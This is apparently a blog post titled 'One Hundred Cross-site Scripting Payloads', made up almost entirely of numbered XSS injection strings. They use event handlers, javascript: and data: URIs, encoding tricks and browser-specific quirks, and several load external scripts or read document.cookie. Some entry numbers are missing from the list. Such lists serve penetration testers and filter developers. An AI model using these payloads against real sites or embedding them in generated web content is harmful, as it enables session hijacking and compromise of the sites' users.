One Hundred Cross-site Scripting Payloads
2) <svg><style>{font-family:'<iframe/onload=confirm(1)>'
3) <input/onmouseover="javaSCRIPT:confirm(1)"
4) <svg><script >alert(1) {Opera}
5) <img/src=`` onerror=this.onerror=confirm(1)
6) <form>
<isindex formaction="javascript:confirm(1)"
7) <img src=``
 onerror=alert(1)

8) <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
9) <script 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
10) <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
11) <script /**/>/**/alert(1)/**/</script /**/
12) "><h1/onmouseover='\u0061lert(1)'>
13) <iframe/src="data:text/html,<svg onload=alert(1)>">
14) <meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
15) <svg><script xlink:href=data:,window.open('https://www.google.com/')></script
16) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
17) <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
18) <iframe src=javascript:alert(document.location)>
19) <form>
<a href="javascript:\u0061lert(1)">X
20) </script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'>
21) <img/	  src=`~` onerror=prompt(1)>
22) <form>
<iframe 	  src="javascript:alert(1)" 	;>
23) <a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
24) http://www.google<script .com>alert(document.location)</script
25) <a href=[�]"� onmouseover=prompt(1)//">XYZ</a
26) <img/src=@  onerror = prompt('1')
27) <style/onload=prompt('XSS')
28) <script ^__^>alert(String.fromCharCode(49))</script ^__^
29) </style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
30) �</form>
<input type="date" onfocus="alert(1)">
31) <form>
<textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
32) <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
33) <iframe srcdoc='<body onload=prompt(1)>'>
34) <a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
35) <script ~~~>alert(0%0)</script ~~~>
36) <style/onload=<!--	> alert (1)>
37) <///style///><span %2F onmousemove='alert(1)'>SPAN
38) <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
39) "><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
40) <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
41) <marquee onstart='javascript:alert(1)'>^__^
42) <div/style="width:expression(confirm(1))">X</div>
{IE7}
43) <iframe// src=javaSCRIPT:alert(1)
44) //<form/action=javascript:alert(document.cookie)><input/type='submit'>//
45) /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
46) //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
47) </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
48) <a/href="javascript: javascript:prompt(1)"><input type="X">
49) </plaintext\></|\><plaintext/onmouseover=prompt(1)
50) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
51) <a href="javascript:\u0061le%72t(1)"><button>
52) <div onmouseover='alert(1)'>
DIV</div>
53) <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
54) <a href="jAvAsCrIpT:alert(1)">X</a>
55) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
56) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
57) <var onmouseover="prompt(1)">On Mouse Over</var>
58) <a href=javascript:alert(document.cookie)>Click Here</a>
59) <img src="/" =_=" title="onerror='prompt(1)'">
60) <%<!--'%><script>alert(1);</script -->
61) <script src="data:text/javascript,alert(1)"></script>
62) <iframe/src \/\/onload = prompt(1)
63) <iframe/onreadystatechange=alert(1)
64) <svg/onload=alert(1)
65) <input value=<><iframe/src=javascript:confirm(1)
66) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
67) http://www.<script>alert(1)</script .com
68) <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
69) <svg><script>alert(1)
70) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
71) <img src=`xx:xx`onerror=alert(1)>
72) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
73) <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
74) <math><a xlink:href="//jsfiddle.net/t846h/">click
75) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
76) <svg contentScriptType=text/vbs><script>MsgBox+1
77) <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
79) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script></svg>
83) <script>+-+-1-+-+alert(1)</script>
84) <body onload="<!-->&#10alert(1)">
85) <script itworksinallbrowsers="">/*<script* */alert(1)</script><script>//
confirm(1);</script>
88) <svg><script onlypossibleinopera:-=""> alert(1)
89) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
90) <script x> alert(1) </script> style="x:">
92) <-- img="" onerror="alert(1)" src="`"> --!>
93)<script src="&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)"></script>
94) <div onclick="alert(1)" onmouseover="prompt(1)" style="height: 100%; left: 0; position: absolute; top: 0; width: 100%;">
x</div>
</--></svg></body>
95) "><img https:="" onerror="window.open(" src="x" www.google.com="" />
96) <br />
<form>
<button formaction="javascript:alert(1)">CLICKME
97) <math><a href="https://www.blogger.com/null" xlink:href="//jsfiddle.net/t846h/">click
98) <object data="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+"></object>
99) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
100) <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a></a></math></button></form>
Post a Comment